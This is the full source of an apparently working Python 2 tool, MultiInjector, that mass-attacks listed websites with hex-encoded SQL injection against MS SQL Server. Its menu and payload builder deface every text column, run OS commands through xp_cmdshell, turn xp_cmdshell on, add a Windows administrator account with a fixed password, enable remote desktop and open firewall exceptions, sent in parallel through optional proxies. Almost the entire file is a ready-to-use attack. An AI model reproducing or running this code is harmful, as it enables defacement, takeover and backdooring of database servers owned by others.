auto defake sqli

1. #!/usr/bin/env python
2. """
3. MultiInjector v.035
4. Copyright 2009-2011, Raviv Raz - ravivr@gmail.com
5. MultiInjector is distributed under the terms of the GNU General Public License
6. MultiInjector is free software: you can redistribute it and/or modify
7. it under the terms of the GNU General Public License as published by
8. the Free Software Foundation, either version 3 of the License, or
9. (at your option) any later version.
10.  
11. This program is distributed in the hope that it will be useful,
12. but WITHOUT ANY WARRANTY; without even the implied warranty of
13. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14. GNU General Public License for more details.
15.  
16. You should have received a copy of the GNU General Public License
17. along with this program. If not, see <http://www.gnu.org/licenses/>.
18.  
19. """
20. try:
21. import psyco
22. except:
23. pass
24. from sys import stdout,argv,stderr
25. import pycurl
26. from urlparse import urlsplit,urlunsplit
27. from urllib import quote
28. from os import system
29. import binascii
30. import StringIO
31. from re import findall
32.  
33. class callback:
34. def __init__(self):
35. self.contents = ''
36. buffer = StringIO.StringIO
37. def feed(self, buf):
38. self.contents = self.contents + buf
39.  
40. def fireUp(target_list,num_conn,proxy_addr,proxy_port):
41. tuples = target_list
42. try:
43. import signal
44. from signal import SIGPIPE, SIG_IGN
45. signal.signal(signal.SIGPIPE, signal.SIG_IGN)
46. except ImportError:
47. pass
48. queue = []
49. for tuple in tuples:
50. for url in tuple:
51. if not url or url[0] == "#":
52. url = str(url).strip()
53. continue
54. cb = callback()
55. queue.append((url,cb))
56. num_urls = len(queue)
57. num_conn = min(num_conn, num_urls)
58. assert 1 <= num_conn <= 10000, "invalid number of concurrent connections"
59. m = pycurl.CurlMulti()
60. m.handles = []
61. for i in range(num_conn):
62. c = pycurl.Curl()
63. c.setopt(pycurl.FOLLOWLOCATION, 1)
64. c.setopt(pycurl.MAXREDIRS, 5)
65. c.setopt(pycurl.CONNECTTIMEOUT, 30)
66. c.setopt(pycurl.TIMEOUT, 300)
67. c.setopt(pycurl.NOSIGNAL, 1)
68. c.setopt(pycurl.USERAGENT,"""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)""")
69. c.setopt(pycurl.HTTPHEADER, ["""Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5""" ,
70. """Accept-Language: en-us,en;q=0.5""",
71. """Accept-Encoding: gzip,deflate""",
72. """Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7""",
73. """Keep-Alive: 300""",
74. """Connection: keep-alive"""])
75. if proxy_addr != '':
76. c.setopt(pycurl.PROXY,proxy_addr)
77. c.setopt(pycurl.PROXYPORT,proxy_port)
78. m.handles.append(c)
79. freelist = m.handles[:]
80. num_processed = 0
81. while num_processed < num_urls:
82. while queue and freelist:
83. url,cb = queue.pop(0)
84. c = freelist.pop()
85. c.setopt(pycurl.URL, url)
86. c.setopt(pycurl.WRITEFUNCTION, cb.feed)
87. m.add_handle(c)
88. c.url = url
89. while 1:
90. ret, num_handles = m.perform()
91. if ret != pycurl.E_CALL_MULTI_PERFORM:
92. break
93. while 1:
94. num_q, ok_list, err_list = m.info_read()
95. for c in ok_list:
96. m.remove_handle(c)
97. freelist.append(c)
98. for c, errno, errmsg in err_list:
99. m.remove_handle(c)
100. freelist.append(c)
101. num_processed = num_processed + len(ok_list) + len(err_list)
102. if num_q == 0:
103. break
104. m.select(1.0)
105. for c in m.handles:
106. c.close()
107. m.close()
108. def usage():
109. stdout.write("""\nCopyright 2008, Raviv Raz - ravivr@gmail.com\nThis program is distributed under the terms of the GNU General Public License\nMultiInjector is an automatic SQL injection utility. It uses a list of URI addresses to test parameter manipulation.\n\
110. Once a vulnerable parameter has been found, a signature-evasive SQL injection is performed in order to achieve\n\
111. one of the following goals:\n
112. 1) Automatic defacement
113. 2) Run OS shell command on DB server
114. 3) Run SQL query on DB server
115. 4) Enable OS shell procedure on DB
116. 5) Add administrative user to DB server with password: T0pSeKret
117. 6) Enable remote desktop on DB server
118. 7) Add allowed program to Windows Firewall on DB server
119. \nUsage: %s [url list] \n\n"""%argv[0])
120. raise SystemExit
121. def build_payload(input,choice,program_name):
122. program_name = program_name.replace("\'","\\'").replace('\"','\\"').replace('>','\>')
123. input = input.replace("\'","\\'").replace('\"','\\"').replace('>','\>')
124. if choice ==1:
125. sql_cmd = """DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''%s''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor;"""%input
126. elif choice ==2:
127. sql_cmd = """EXEC MASTER..XP_CMDSHELL '%s'"""%input
128. elif choice ==3:
129. sql_cmd = """EXEC '%s'"""%input
130. elif choice ==4:
131. sql_cmd = """EXEC sp_configure 'show advanced options',1 ; RECONFIGURE ; EXEC sp_configure 'xp_cmdshell',1 ; RECONFIGURE"""
132. elif choice ==5:
133. sql_cmd = """EXEC MASTER..XP_CMDSHELL 'net user %s T0pSeKret /add && net localgroup administrators %s /add'"""%(input,input)
134. elif choice ==6:
135. sql_cmd = """EXECUTE master.dbo.xp_regwrite N'HKEY_LOCAL_MACHINE',N'SYSTEM\CurrentControlSet\Control\Terminal Server',N'fDenyTSConnections',N'REG_DWORD',0;--"""
136. elif choice ==7:
137. input = input.replace("\'","\\'").replace('\"','\\"')
138. sql_cmd = """EXEC MASTER..XP_CMDSHELL 'netsh firewall add allowedprogram %s %s ENABLE'"""%(input,program_name)
139. if len(input) % 2 == 0:
140. payload = binascii.hexlify(sql_cmd)
141. else:
142. payload = binascii.hexlify(sql_cmd[:-1])
143. cmd = " or 1=1;DECLARE @S VARCHAR(4000);SET @S=CAST(0x%s AS VARCHAR(4000));EXEC(@S);--"%payload
144. return quote(cmd)
145. def fullurl(host,path,params):
146. return urlunsplit(('http',host,path,params,''))
147. def is_numeric(param):
148. if findall("^.*=[0-9]+$",param):
149. return True
150. else:
151. return False
152. def change_params(params,payload):
153. new_list = []
154. split_params = params.split('&')
155. for i in range(len(split_params)):
156. if is_numeric(split_params[i]):
157. new_param = str(split_params[i])+payload
158. else:
159. new_param = str(split_params[i])+"%27"+payload
160. new_list.append(params.replace(split_params[i],new_param))
161. return new_list
162. def add_payload(url,payload):
163. spliturl = urlsplit(url,allow_fragments=True)
164. protocol = spliturl[0]
165. host = spliturl[1]
166. params = spliturl[3]
167. path = spliturl[2]
168. new_params = change_params(params,payload)
169. new_urls =[]
170. for param in new_params:
171. new_urls.append(fullurl(host,path,param))
172. return new_urls
173. def find_parameterized_urls(list):
174. newlist = []
175. for item in list:
176. if urlsplit(item)[3] != '':
177. newlist.append(item.strip())
178. return newlist
179. def menu():
180. conn_num = 5
181. system('cls')
182. stdout.write("""
183. Please choose the attack of your flavor:\n
184. 1) Automatic defacement
185. 2) Run OS shell command on DB server
186. 3) Run SQL query on DB server
187. 4) Enable OS shell procedure on DB
188. 5) Add administrative user to DB server with password: T0pSeKret
189. 6) Enable remote desktop on DB server
190. 7) Add allowed program to Windows Firewall on DB server
191. \n""")
192. try:
193. program = ""
194. choice = int(raw_input("> "))
195. if choice == 1:
196. command = str(raw_input("\n\nEnter defacement content:\n\n> "))
197. elif choice == 2:
198. command = str(raw_input("\n\nEnter OS command to run:\n\n> "))
199. elif choice == 3:
200. command = str(raw_input("\n\nEnter SQL query to run:\n\n> "))
201. elif choice == 4:
202. command = ""
203. elif choice == 5:
204. command = str(raw_input("\n\nEnter administrative user name:\n\n>"))
205. elif choice == 6:
206. command = ""
207. elif choice == 7:
208. command = str(raw_input("Enter program full path (c:\path\program.exe):\n>"))
209. program = str(raw_input("Enter program name in firewall allowed programs list:\n>"))
210. elif not choice in (1,2,3,4,5,6,7):
211. menu()
212. except KeyboardInterrupt:
213. stdout.write('\n\nC ya!\n\n')
214. raise SystemExit
215. except:
216. menu()
217. stdout.write('Number of parallel connections: (default=5)\n')
218. try:
219. conn_num = int(raw_input("> "))
220. except:
221. conn_num = 5
222. stdout.write('Use HTTP proxy? [y/n]: (default=n)\n')
223. use_proxy = (raw_input("> "))
224. if 'y' in use_proxy:
225. stdout.write('Proxy address: \n')
226. proxy_addr = (raw_input("> "))
227. stdout.write('Proxy port: \n')
228. proxy_port = int(raw_input("> "))
229. else:
230. proxy_addr = ''
231. proxy_port = 0
232. return choice,command,conn_num,proxy_addr,proxy_port,program
233. def main():
234. if len(argv)<2:
235. usage()
236. else:
237. try:
238. stdout.write('\n[!] Opening url file...\n')
239. old_urls = open(argv[1]).readlines()
240. except:
241. stderr.write("""\n[x] Failed to open %s \n"""%argv[1])
242. raise SystemExit
243. choice,command,conn_num,proxy_addr,proxy_port,program_name = menu()
244. payload = build_payload(command,choice,program_name)
245. stdout.write('[!] Bombs Away !!\n')
246. urls = []
247. for item in find_parameterized_urls(old_urls):
248. injected = add_payload(item,payload)
249. urls.append(injected)
250. if len(urls)>0:
251. if proxy_addr !='':
252. fireUp(urls,conn_num,proxy_addr,proxy_port)
253. elif proxy_addr =='':
254. fireUp(urls,conn_num,'',0)
255. stdout.write('[v] Attacks finished\n')
256. else:
257. print """[x] No URL found with parameters to inject.\nWe must have at least one URL like:\nhttp://www.victim.com/program.asp?p1=v1&p2=v2"""
258. if __name__ == "__main__":
259. main()